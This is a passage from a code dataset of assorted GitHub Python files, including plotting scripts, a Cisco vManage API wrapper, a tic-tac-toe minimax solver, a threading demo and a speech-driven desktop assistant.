file_size_map[file_name_id] = max(file_size_map[file_name_id], new_file_size)\n \n input_log.close()\n\nwith open(file_size_map_file, 'w') as f:\n print(file_size_map, file=f) \n","repo_name":"DIR-LAB/lustreaging","sub_path":"parse-darshan-logs-intrepid.py","file_name":"parse-darshan-logs-intrepid.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71737945521","text":"import requests\r\nimport os\r\nfrom datetime import datetime\r\nimport matplotlib.pyplot as plt\r\n\r\n# Replace with your GitHub username and Personal Access Token\r\nusername = os.getenv('GH_USERNAME')\r\ntoken = os.getenv('GH_TOKEN')\r\n\r\n# API URL for the user's recent activity\r\napi_url = f'https://api.github.com/users/{username}/events/public'\r\n\r\nheaders = {\r\n 'Authorization': f'token {token}'\r\n}\r\n\r\ntry:\r\n response = requests.get(api_url, headers=headers)\r\n response.raise_for_status()\r\n events = response.json()\r\n\r\n # Initialize lists to store timestamps and event types\r\n timestamps = []\r\n event_types = []\r\n\r\n for event in events:\r\n created_at = event['created_at']\r\n timestamps.append(datetime.fromisoformat(created_at.replace('Z', '')))\r\n event_types.append(event['type'])\r\n\r\n # Create a list of events per day\r\n days = []\r\n for timestamp, event_type in zip(timestamps, event_types):\r\n day = timestamp.date()\r\n if not days or day != days[-1]:\r\n days.append(day)\r\n\r\n # Create a list of event counts per day\r\n event_counts = [event_types.count(event_type) for event_type in set(event_types)]\r\n\r\n # 
Create the activity chart\r\n plt.figure(figsize=(12, 6))\r\n plt.bar(days, event_counts, width=0.9)\r\n plt.xlabel('Date')\r\n plt.ylabel('Event Count')\r\n plt.title(f'GitHub Activity Chart for {username}')\r\n plt.xticks(rotation=45)\r\n plt.tight_layout()\r\n\r\n \r\n # Show the activity chart\r\n plt.show()\r\n\r\nexcept requests.exceptions.RequestException as e:\r\n print(f\"Error: {e}\")\r\n","repo_name":"Yantiomene/Github-stats","sub_path":"github_api_queries/get_draw_act.py","file_name":"get_draw_act.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"33680579956","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\n\nfrom Driver import Driver\nfrom Subject_Analysis import Subject_Analysis\n\nclass Data_plotter:\n def __init__(self, Alcoholic_data: pd.DataFrame, Non_Alcoholic_data: pd.DataFrame):\n \n self.subjects = [] # Create list of subjects' objects\n self.subjects_analysis = [] # Create list of subjects' analyses objects\n \n concat_data = pd.concat([Alcoholic_data, Non_Alcoholic_data],axis=0) \n IDs, IDs_order = np.unique(concat_data.driver, return_index=True)\n self.IDs = IDs[np.argsort(IDs_order)] # Gets the IDs sorted by location in concat data\n \n # Extract data for each subject (driver)\n for ind, ID in enumerate(self.IDs):\n driver_data = concat_data.query('driver == @ID')\n self.subjects.append(Driver(ID, driver_data)) \n self.subjects_analysis.append(Subject_Analysis(self.subjects[ind].Steering, \n self.subjects[ind].TimeStamp))\n \n # %% PLOTS \n def Plot_Steering_Statistics(self):\n # This function plots the descriptive statistics of drivers' steering wheel signals\n num_of_stats = len(self.subjects_analysis[0].steering_features) # Number of statistics to show\n keys_stats = list(self.subjects_analysis[0].steering_features.keys()) # description of each stat (feature)\n drivers_stats = np.zeros((len(self.subjects),num_of_stats)) # preallocation with zeros array\n drivers_alcohol_cc = []\n rows = 2\n cols = int(np.ceil(num_of_stats/rows))\n \n # Creating a matrix of features per subject (Rows = subjects, Columns = features)\n for ind, driver in enumerate(self.subjects):\n drivers_stats[ind,:] = np.array(list(self.subjects_analysis[ind].steering_features.values()))\n drivers_alcohol_cc.append(driver.Alcohol_cc) \n \n labels = [str(i) for i in drivers_alcohol_cc]\n \n fig0, ax = plt.subplots(rows, cols, figsize=(40,20))\n ax = ax.flatten()\n # Plot in barplot style - X axis: alcohol consumed (per subject), Y axis: feature value (per subject)\n for i, key in enumerate(keys_stats):\n \n ax[i].bar(range(len(labels)), drivers_stats[:,i], 0.5); \n ax[i].set_xticks(range(len(labels))); ax[i].set_xticklabels(labels)\n ax[i].set_xlabel('Alcohol consumed [cc]'); ax[i].set_ylabel(key); ax[i].set_title(key + '\\nSteering wheel per driver')\n \n # Add driver name to each column\n for j,name in enumerate(self.IDs):\n ax[i].text(j, drivers_stats[j,i], name, ha='center')\n \n fig0.suptitle(\"Time Domain: Steering's signal features\")\n fig0.show() \n \n def Plot_Speed_Acceleration(self):\n # This function plots speed and normalized acceleration of random driver's steering wheel signal. 
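A minimal usage sketch\n        # (alc_df / non_alc_df are assumed input DataFrames, not names from this file):\n        #   Data_plotter(alc_df, non_alc_df).Plot_Speed_Acceleration()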
\n chosen_subject = random.randint(0, len(self.subjects)-1)\n subject = self.subjects_analysis[chosen_subject]\n \n fig1, ax = plt.subplots(2,1,figsize=(15,10))\n ax = ax.flatten()\n \n ax[0].plot(subject.TimeStamp[0:subject.speed.size], subject.speed)\n ax[0].set_xlabel('TimeStamp [sec]'); ax[0].set_ylabel('Steering Speed [degree°/sec]')\n ax[0].set_title('Steering wheel speed:\\n' + self.subjects[chosen_subject].ID)\n \n ax[1].plot(subject.TimeStamp[0:subject.acc_normalized.size], subject.acc_normalized)\n ax[1].set_xlabel('TimeStamp [sec]'); ax[1].set_ylabel('Normalized Steering Acceleration [degree°/sec^2]')\n ax[1].set_title('Steering wheel Acceleration - Normalized:\\n' + self.subjects[chosen_subject].ID)\n fig1.show()\n \n def Plot_fft_visual(self):\n # This function plot a visualization of steering wheel acceleration signal in frequency domain for two drivers,\n # one not consumed alcohol, and one that does. In addition, each graph has a fitted baseline. \n chosen_drivers = [self.subjects[0], self.subjects[-1]]\n chosen_drivers_stats = [self.subjects_analysis[0], self.subjects_analysis[-1]]\n \n fig2, ax = plt.subplots(2,1,figsize=(15,10))\n ax = ax.flatten()\n \n for i, driver in enumerate(chosen_drivers_stats):\n ax[i].plot(driver.freqs, driver.fft_acc, label='FFT')\n ax[i].plot(driver.freqs, driver.baseline, label='Baseline')\n \n ax[i].legend()\n ax[i].set_xlabel('[Hz]'); ax[i].set_ylabel('dB'); ax[i].set_title(chosen_drivers[i].ID + '\\nSteering wheel acceleration: Frequency Domain')\n \n fig2.suptitle(\"Frequency Domain: Steering's acceleration signal\")\n fig2.show() \n \n \n def Plot_Acc_FFT_Statistics(self):\n # This function plots the insights of drivers' steering wheel acceleration signals in frequency domain\n num_of_stats = len(self.subjects_analysis[0].steering_acc_features) # Number of statistics to show\n keys_stats = list(self.subjects_analysis[0].steering_acc_features.keys()) # description of each stat (feature)\n drivers_stats = np.zeros((len(self.subjects),num_of_stats)) # preallocation with zeros array\n drivers_alcohol_cc = []\n rows = 2\n cols = int(np.ceil(num_of_stats/rows))\n \n # Creating a matrix of features per subject (Rows = subjects, Columns = features)\n for ind, driver in enumerate(self.subjects):\n drivers_stats[ind,:] = np.array(list(self.subjects_analysis[ind].steering_acc_features.values()))\n drivers_alcohol_cc.append(driver.Alcohol_cc) \n \n labels = [str(i) for i in drivers_alcohol_cc]\n \n fig3, ax = plt.subplots(rows, cols, figsize=(40,20))\n ax = ax.flatten()\n # Plot in barplot style - X axis: alcohol consumed (per subject), Y axis: feature value (per subject)\n for i, key in enumerate(keys_stats):\n \n ax[i].bar(range(len(labels)), drivers_stats[:,i], 0.5); \n ax[i].set_xticks(range(len(labels))); ax[i].set_xticklabels(labels)\n ax[i].set_xlabel('Alcohol consumed [cc]'); ax[i].set_ylabel(key); ax[i].set_title(key + '\\nSteering wheel acceleration: Frequency Domain')\n \n # Add driver name to each column\n for j,name in enumerate(self.IDs):\n ax[i].text(j, drivers_stats[j,i], name, ha='center')\n \n fig3.suptitle(\"Frequency Domain: Steering wheel acceleration's signal features\")\n fig3.show() \n \n \n def Plot_peak_detection(self):\n # This function plots random driver's steering wheel signal with peak detection in overlay.\n chosen_subject = random.randint(0, len(self.subjects)-1)\n subject = self.subjects_analysis[chosen_subject]\n \n fig4 = plt.figure()\n plt.plot(subject.TimeStamp, subject.Steering)\n 
plt.scatter(subject.TimeStamp[subject.peaks_locs], subject.Steering[subject.peaks_locs], color='red')\n plt.xlabel('TimeStamp [sec]'); plt.ylabel('Steering [degree°]')\n plt.title('Peak Detection algorithm visualization:\\n' + self.subjects[chosen_subject].ID)\n \n fig4.show() \n \n \n # %% DATASETS\n def get_DF_with_sub_signals(self):\n # This function creates a csv file and a pandas DataFrame with sub signals label to each entry for each subject, with data manipulation\n # to the TimeStamp and Steering.\n DF_with_sub_signals = pd.DataFrame()\n \n for _,subject in enumerate(self.subjects): \n df = subject.create_personal_DF()\n DF_with_sub_signals = pd.concat([DF_with_sub_signals, df], axis=0)\n \n DF_with_sub_signals.to_csv('Dataset_with_sub_signals.csv', encoding='utf-8')\n return DF_with_sub_signals\n\n\n\n \n","repo_name":"Yuvalmaster/Steering-Wheel-Signal-Analysis","sub_path":"Data_plotter.py","file_name":"Data_plotter.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13984669110","text":"\"\"\"Cisco vManage Cluster API Methods.\n\"\"\"\n\nfrom vmanage.api.http_methods import HttpMethods\nfrom vmanage.data.parse_methods import ParseMethods\n\n\nclass Cluster(object):\n \"\"\"vManage Cluster API\n\n Responsible for DELETE, GET, POST, PUT methods against vManage\n Cluster.\n\n \"\"\"\n def __init__(self, session, host, port=443):\n \"\"\"Initialize Cluster object with session parameters.\n\n Args:\n session (obj): Requests Session object\n host (str): hostname or IP address of vManage\n port (int): default HTTPS 443\n\n \"\"\"\n\n self.session = session\n self.host = host\n self.port = port\n self.base_url = f'https://{self.host}:{self.port}/dataservice/'\n\n def get_cluster_connected_devices_list(self, vmanage_cluster_ip):\n \"\"\"Obtain vManage cluster connected devices\n\n Args:\n vmanage_cluster_ip (str): vManage cluster interface IP address\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/connectedDevices/{vmanage_cluster_ip}\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_health_details_list(self):\n \"\"\"Obtain vManage cluster health details\n\n Args:\n None (None):\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/health/details\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_health_status_list(self):\n \"\"\"Obtain vManage cluster health status\n\n Args:\n None (None):\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/health/status\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_list(self):\n \"\"\"Obtain vManage cluster list\n\n Args:\n None (None):\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/list\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_ip_addresses_dict(self):\n \"\"\"Obtain vManage cluster IP addresses\n\n Args:\n None (None):\n\n Returns:\n result (dict): All data associated with a response.\n 
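Hedged example of the returned mapping (node IDs are illustrative only):\n                {\"0\": <iplist JSON for node \"0\">, \"1\": <iplist JSON for node \"1\">}\n        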
\"\"\"\n\n result = {}\n vmanages = self.get_cluster_list()\n for vmanage in vmanages[0]['data']:\n vmanage_id = vmanage['vmanageID']\n url = f\"{self.base_url}clusterManagement/iplist/{vmanage_id}\"\n response = HttpMethods(self.session, url).request('GET')\n # result = ParseMethods.parse_data(response)\n result[vmanage_id] = response['json']\n return result\n\n def get_cluster_ready_state(self):\n \"\"\"Obtain vManage cluster ready state\n\n Args:\n None (None):\n\n Returns:\n result (bool): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/isready\"\n response = HttpMethods(self.session, url).request('GET')\n result = response['json']['isReady']\n # result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_node_properties(self):\n \"\"\"Obtain connected vManage cluster node properties\n\n Args:\n None (None):\n\n Returns:\n result (dict): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/nodeProperties\"\n response = HttpMethods(self.session, url).request('GET')\n result = response['json']\n # result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_tenancy_mode(self):\n \"\"\"Obtain vManage cluster tenancy mode\n\n Args:\n None (None):\n\n Returns:\n result (dict): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/tenancy/mode\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_vmanage_details_list(self, vmanage_cluster_ip):\n \"\"\"Obtain vManage cluster specific vManage details using cluster interface IP\n\n Args:\n vmanage_cluster_ip (str): vManage cluster interface IP address\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/vManage/details/{vmanage_cluster_ip}\"\n response = HttpMethods(self.session, url).request('GET', timeout=30)\n result = ParseMethods.parse_data(response)\n return result\n","repo_name":"CiscoDevNet/python-viptela","sub_path":"vmanage/api/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"75"} +{"seq_id":"31967095689","text":"import logging\nfrom typing import List, Tuple\n\nimport torch\nfrom reagent.core import types as rlt\nfrom reagent.prediction.predictor_wrapper import DiscreteDqnWithPreprocessor\n\nlogger = logging.getLogger(__name__)\n\n\nclass BanditRewardNetPredictorWrapper(torch.jit.ScriptModule):\n def __init__(\n self,\n reward_model_with_preprocessor: DiscreteDqnWithPreprocessor,\n action_names: List[str],\n state_feature_config: rlt.ModelFeatureConfig,\n ) -> None:\n super().__init__()\n self.reward_model_with_preprocessor = torch.jit.trace(\n reward_model_with_preprocessor,\n reward_model_with_preprocessor.input_prototype(),\n )\n self.action_names = torch.jit.Attribute(action_names, List[str])\n\n @torch.jit.script_method\n def forward(\n self, state: rlt.ServingFeatureData\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n reward_predictions = self.reward_model_with_preprocessor(state)\n num_examples = reward_predictions.size()[0]\n num_actions = len(self.action_names)\n assert reward_predictions.shape == (\n num_examples,\n num_actions,\n ), f\"Invalid shape {reward_predictions.shape} != ({num_examples}, {num_actions})\"\n mask = torch.ones_like(reward_predictions, dtype=torch.uint8)\n return 
(reward_predictions, mask)\n","repo_name":"facebookresearch/ReAgent","sub_path":"reagent/prediction/cfeval/predictor_wrapper.py","file_name":"predictor_wrapper.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":3467,"dataset":"github-code","pt":"75"} +{"seq_id":"70145588722","text":"import constants\nimport datetime\n\ndef date_range(startType, startAmount, endType=None, endAmount=None):\n\t''' returns a 2-tuple dtStart and dtEnd for time ranges. Time delta takes, 'days', 'seconds', 'minutes', 'hours', 'weeks' '''\n\n\tassert startType in constants.DATE_DELTA_TYPES, \"startType {} is invalid\".format(startType)\n\n\tdtStart = datetime.datetime.now() - datetime.timedelta(**{startType: startAmount})\n\t\n\tif endType == None or endAmount == None:\n\t\tdtEnd = datetime.datetime.now()\n\telse:\n\t\tdtEnd = datetime.datetime.now() - datetime.timedelta(**{endType: endAmount})\n\n\treturn dtStart, dtEnd\n\t","repo_name":"disler/1000notifier","sub_path":"any/date_helpers.py","file_name":"date_helpers.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2518842625","text":"\"\"\"\nTic Tac Toe Player\n\"\"\"\n\nimport math\nfrom copy import deepcopy\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\n\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n x_count = 0\n o_count = 0\n\n for i in board:\n for j in i:\n if j == X:\n x_count+=1\n elif j == O:\n o_count+=1\n\n if x_count > o_count:\n return O\n else:\n return X\n\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n actions = set()\n\n for i in range (3):\n for j in range(3):\n if board[i][j] == EMPTY:\n actions.add((i, j))\n\n return actions\n\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n if action not in actions(board):\n raise Exception\n\n board_copy = deepcopy(board)\n board_copy[action[0]][action[1]] = player(board_copy)\n\n return board_copy\n\n\ndef winner(board):\n \"\"\"\n Returns the winner of the game, if there is one.\n \"\"\"\n # rows\n if (board[0][0] == board[0][1]) and (board[0][0] == board[0][2]) and (board[0][0] != EMPTY):\n return board[0][0]\n if (board[1][0] == board[1][1]) and (board[1][0] == board[1][2]) and (board[1][0] != EMPTY):\n return board[1][0]\n if (board[2][0] == board[2][1]) and (board[2][0] == board[2][2]) and (board[2][0] != EMPTY):\n return board[2][0]\n # columns\n if (board[0][0] == board[1][0]) and (board[0][0] == board[2][0]) and (board[0][0] != EMPTY):\n return board[0][0]\n if (board[0][1] == board[1][1]) and (board[0][1] == board[2][1]) and (board[0][1] != EMPTY):\n return board[0][1]\n if (board[0][2] == board[1][2]) and (board[0][2] == board[2][2]) and (board[0][2] != EMPTY):\n return board[0][2]\n # diags\n if (board[0][0] == board[1][1]) and (board[0][0] == board[2][2]) and (board[1][1] != EMPTY):\n return board[0][0]\n if (board[0][2] == board[1][1]) and (board[0][2] == board[2][0]) and (board[1][1] != EMPTY):\n return board[0][2]\n\n return None\n\n\ndef terminal(board):\n \"\"\"\n Returns True if game is over, False otherwise.\n \"\"\"\n if winner(board) is not None or not actions(board):\n return True\n else:\n 
return False\n\n\ndef utility(board):\n    \"\"\"\n    Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n    \"\"\"\n    curr_winner = winner(board)\n\n    if curr_winner == X:\n        return 1\n    elif curr_winner == O:\n        return -1\n    else:\n        return 0\n\n\ndef minimax(board):\n    \"\"\"\n    Returns the optimal action for the current player on the board.\n    \"\"\"\n    if terminal(board):\n        return None\n    elif board == initial_state():\n        # opening shortcut: every first move draws under optimal play,\n        # so return the fixed move (0, 1) instead of searching the whole tree\n        return 0, 1\n    else:\n        curr_player = player(board)\n        best_value = float(\"-inf\") if curr_player == X else float(\"inf\")\n\n        for action in actions(board):\n            new = perform_minimax(result(deepcopy(board), action), best_value)\n\n            if curr_player == X:\n                new = max(best_value, new)\n            elif curr_player == O:\n                new = min(best_value, new)\n\n            if new != best_value:\n                best_value = new\n                move = action\n\n        return move\n\n\ndef perform_minimax(board, best_value):\n    if terminal(board):\n        return utility(board)\n    else:\n        curr_player = player(board)\n        value = float(\"-inf\") if curr_player == X else float(\"inf\")\n\n        for action in actions(board):\n            new = perform_minimax(result(board, action), value)\n\n            if curr_player == X:\n                if new > best_value:\n                    return new\n                value = max(value, new)\n            elif curr_player == O:\n                if new < best_value:\n                    return new\n                value = min(value, new)\n\n        return value\n","repo_name":"hannahbrooks/cs50-ai","sub_path":"tictactoe/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32176283538","text":"import json\n\n\nclass StateParser():\n    def __init__(self, resp: dict):\n        self.time = resp['time']\n        self.states = [self._parseState(s) for s in resp['states']]\n\n    def _parseState(self, state: list):\n        return {\n            'icao24': state[0],\n            'callsign': state[1],\n            'origin_country': state[2],\n            'updated_at': state[4],\n            'position': {\n                'lon': state[5],\n                'lat': state[6]\n            },\n            'velocity': state[9],\n            'altitude': state[13]\n        }","repo_name":"annis-souames/flights-metrics","sub_path":"api/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"8026961869","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\nimport threading\nimport time\n\nevent = threading.Event()\n\ndef lighter():\n    count = 0\n    event.set()\n    while True:\n        if count > 5 and count <= 10:\n            event.clear()  # clear the flag: switch to red\n            print(\"\\033[41;1m红灯\\033[0m\")\n        elif count > 10:\n            event.set()  # switch back to green\n            count = 0\n        else:\n            print(\"\\033[42;1m绿灯\\033[0m\")\n        time.sleep(1)\n        count += 1\n\ndef car(name):\n    while True:\n        if event.is_set():\n            print(\"%s is running......\" % name)\n            time.sleep(1)\n        else:\n            print(\"%s 遇到红灯 waiting......\" % name)\n            event.wait()\n            print(\"\\033[42;1m%s 绿灯亮了,Let's go!!\\033[0m\" % name)\n\nlight = threading.Thread(target=lighter,)\nlight.start()\n\ncar1 = threading.Thread(target=car,args=(\"Tesla\",))\ncar1.start()","repo_name":"huyuedong/travel","sub_path":"09/红绿灯.py","file_name":"红绿灯.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3537763592","text":"import json\n\nfrom storyhub.sdk.service.Lifecycle import Lifecycle\nfrom storyhub.sdk.service.LifecycleOption import (\n    LifecycleOption,\n    LifecycleOptionType,\n)\nfrom tests.storyhub.sdk.JsonFixtureHelper import JsonFixtureHelper\n\nlifecycle_fixture = 
JsonFixtureHelper.load_fixture(\"lifecycle_fixture\")\n\nlifecycle_fixture_json = json.dumps(lifecycle_fixture)\n\n\ndef test_deserialization(mocker):\n mocker.patch.object(json, \"loads\", return_value=lifecycle_fixture)\n\n mocker.patch.object(LifecycleOption, \"from_dict\")\n\n assert Lifecycle.from_json(jsonstr=lifecycle_fixture_json) is not None\n\n json.loads.assert_called_with(lifecycle_fixture_json)\n\n LifecycleOption.from_dict.assert_called_with(\n data={\n \"type\": LifecycleOptionType.STARTUP,\n \"lifecycle_option\": lifecycle_fixture[\"lifecycle\"][\"startup\"],\n }\n )\n\n\ndef test_serialization(mocker):\n mocker.patch.object(json, \"dumps\", return_value=lifecycle_fixture_json)\n\n service_command = Lifecycle.from_dict(data=lifecycle_fixture)\n\n assert service_command.as_json(compact=True) is not None\n json.dumps.assert_called_with(lifecycle_fixture, sort_keys=True)\n\n assert service_command.as_json() is not None\n json.dumps.assert_called_with(lifecycle_fixture, indent=4, sort_keys=True)\n","repo_name":"wilzbach/hub-sdk-python","sub_path":"tests/storyhub/sdk/service/Lifecycle_test.py","file_name":"Lifecycle_test.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18940359270","text":"\"\"\"\nFind the last position of a target number in a sorted array. Return -1 if target does not exist.\n\nExample\nExample 1:\n\nInput: nums = [1,2,2,4,5,5], target = 2\nOutput: 2\nExample 2:\n\nInput: nums = [1,2,2,4,5,5], target = 6\nOutput: -1\n\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param nums: An integer array sorted in ascending order\n @param target: An integer\n @return: An integer\n \"\"\"\n def lastPosition(self, nums, target):\n\n if not nums:\n return - 1\n #create 2 pointers start and end of list\n left, right = 0, len(nums) - 1\n #most important part of binary search needs to check left +1 vs right\n while left + 1 < right:\n #create a mid point\n mid = (left + right) // 2\n #needs to be included since we are looking for the last index.\n if nums[mid] <= target:\n left = mid\n else:\n right = mid\n #checks to see right index first if it is return right index else left and if not either return -1\n if nums[right] == target:\n return right\n elif nums[left] == target:\n return left\n else:\n return -1\n","repo_name":"charlessokolowski/Problems","sub_path":"Binary Search/find_last_index.py","file_name":"find_last_index.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31870075613","text":"import speech_recognition as sr\nimport pyttsx3\nimport datetime\nimport calendar\nimport wikipedia\nimport webbrowser\nimport subprocess\nimport pause\nimport wolframalpha\nimport requests\nimport json\n\n\nMASTER = \"sir\"\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[0].id)\n\ndef speak(text):\n engine.say(text)\n engine.runAndWait()\n\ndef wishme():\n hour = int(datetime.datetime.now().hour)\n\n if hour>=0 and hour <12:\n speak(\"Good Morning \"+ MASTER)\n elif hour>=12 and hour <18:\n print(\"Good Afternoon \"+ MASTER)\n speak(\"Good Afternoon \" + MASTER)\n else:\n print(\"Good Evening \" + MASTER)\n speak(\"Good Evening \"+ MASTER)\n\ndef today_date():\n now = datetime.datetime.now()\n date_now = datetime.datetime.today()\n week_now = calendar.day_name[date_now.weekday()]\n month_now = now.month\n day_now = now.day\n\n 
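# A hedged aside: calendar.month_name[month_now] from the already-imported\n    # calendar module would yield the same English month name as the table below.\n    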
months = [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\",\n ]\n\n ordinals = [\n \"1st\",\n \"2nd\",\n \"3rd\",\n \"4th\",\n \"5th\",\n \"6th\",\n \"7th\",\n \"8th\",\n \"9th\",\n \"10th\",\n \"11th\",\n \"12th\",\n \"13th\",\n \"14th\",\n \"15th\",\n \"16th\",\n \"17th\",\n \"18th\",\n \"19th\",\n \"20th\",\n \"21st\",\n \"22nd\",\n \"23rd\",\n \"24th\",\n \"25th\",\n \"26th\",\n \"27th\",\n \"28th\",\n \"29th\",\n \"30th\",\n \"31st\",\n ]\n\n return \"Today is \" + week_now + \", \" + months[month_now - 1] + \" the \" + ordinals[day_now - 1] + \".\"\n\ndef takecmd():\n r=sr.Recognizer()\n with sr.Microphone() as source :\n print(\"Listening...\")\n audio = r.listen(source)\n\n query = \" \"\n\n try :\n print(\"recognizing...\")\n query = r.recognize_google(audio,language='en-us')\n print(\"You said: \" + query)\n\n\n except Exception as e:\n speak(\"Say That again !\")\n query = \"None\"\n return query\n\nprint(\"Initializing ...\")\nspeak(\"Initializing ...\")\nprint(f\"Hello{MASTER}\")\nspeak(f\"Hello{MASTER}\")\nwishme()\nspeak(f\"{MASTER} What do you want me to do for you : \")\n\ndef note(text):\n date = datetime.datetime.now()\n file_name = str(date).replace(\":\", \"-\") + \"-note.txt\"\n with open(file_name, \"w\") as f:\n f.write(text)\n\n subprocess.Popen([\"notepad.exe\", file_name])\n\n\ndef assistant(query):\n\n\n\n if 'time' in query:\n time = datetime.datetime.now().strftime(\"%H:%M\")\n speak(f\"The current Time is {time}\")\n print(f\"{time}\")\n\n elif \"wikipedia\" in query :\n query = query.replace('wikipedia','')\n speak(\"Searching Wikipedia ...\")\n results = wikipedia.summary(query,sentences=2)\n print(results)\n speak(results)\n\n print(\"Done Sir, Anything Else !\")\n speak(\"Done Sir, Anything Else !\")\n\n elif \"who are you\" in query :\n print(\"I am your Assistant Pheonix. i can look up answers for you and if you need anything just ask. Your wish is my command\")\n speak(\"I am your Assistant Pheonix. i can look up answers for you and if you need anything just ask. Your wish is my command\")\n\n elif \"why do you exist\" in query or \"why did you come\" in query:\n speak(f\"It is a secret.\")\n\n elif \"how are you\" in query:\n print(\"I am fine, Thank you for asking!. This is challenging time for us. i hope your and your loved ones are safe and healthy\")\n speak(\"I am fine, Thank you for asking!. This is challenging time for us. 
I hope you and your loved ones are safe and healthy\")\r\n        print(\"\\nHow are you?\")\r\n        speak(\"\\nHow are you?\")\r\n\r\n    elif \"so lets move on\" in query :\r\n        speak(\"what do you want me to do sir\")\r\n\r\n    elif \"fine\" in query or \"good\" in query:\r\n        print(\"It's good to know that you are fine\")\r\n        speak(\"It's good to know that you are fine\")\r\n\r\n    elif \"spotify\" in query :\r\n        print(\"Opening Spotify\")\r\n        speak(\"Opening Spotify\")\r\n        subprocess.Popen([\"C:\\\\Users\\\\rutvi\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe\"])\r\n\r\n        print(\"Spotify Opened , Anything Else Sir\")\r\n        speak(\"Spotify Opened , Anything Else Sir\")\r\n\r\n    elif \"steam\" in query :\r\n        speak(\"Let's get some frags Sir\")\r\n        result = subprocess.Popen([\"D:\\\\STEAM\\\\steam.exe\"], shell=True)\r\n\r\n        speak(\"Done Sir, Anything Else !\")\r\n\r\n    elif \"open\" in query :\r\n        try :\r\n            website = query.split(' ')\r\n            webbrowser.open(\"https://\"+website[website.index(\"open\")+1]+\".com\")\r\n            speak(website[website.index(\"open\")+1] + \" is opened\")\r\n        except Exception as e :\r\n            speak(\"i can't see it\")\r\n\r\n    elif \"calculate\" in query:\r\n        app_id = \"XXX\"\r\n        client = wolframalpha.Client(app_id)\r\n        ind = query.lower().split().index(\"calculate\")\r\n        text = query.split()[ind + 1:]\r\n        res = client.query(\" \".join(text))\r\n        answer = next(res.results).text\r\n        print(\"The answer is \" + answer)\r\n        speak(\"The answer is \" + answer)\r\n\r\n    elif \"what is\" in query or \"who is\" in query:\r\n        app_id = \"XXX\"\r\n        client = wolframalpha.Client(app_id)\r\n        ind = query.lower().split().index(\"is\")\r\n        text = query.split()[ind + 1:]\r\n        res = client.query(\" \".join(text))\r\n        answer = next(res.results).text\r\n        print(answer)\r\n        speak(answer)\r\n\r\n    elif \"note\" in query or \"remember this\" in query:\r\n        speak(\"What would you like me to write down?\")\r\n        note_text = takecmd()\r\n        note(note_text)\r\n        speak(\"I have made a note of that.\")\r\n        speak(\"Anything else sir !\")\r\n\r\n    elif \"where is\" in query :\r\n        ind = query.lower().split().index(\"is\")\r\n        location = query.split()[ind + 1:]\r\n        url = 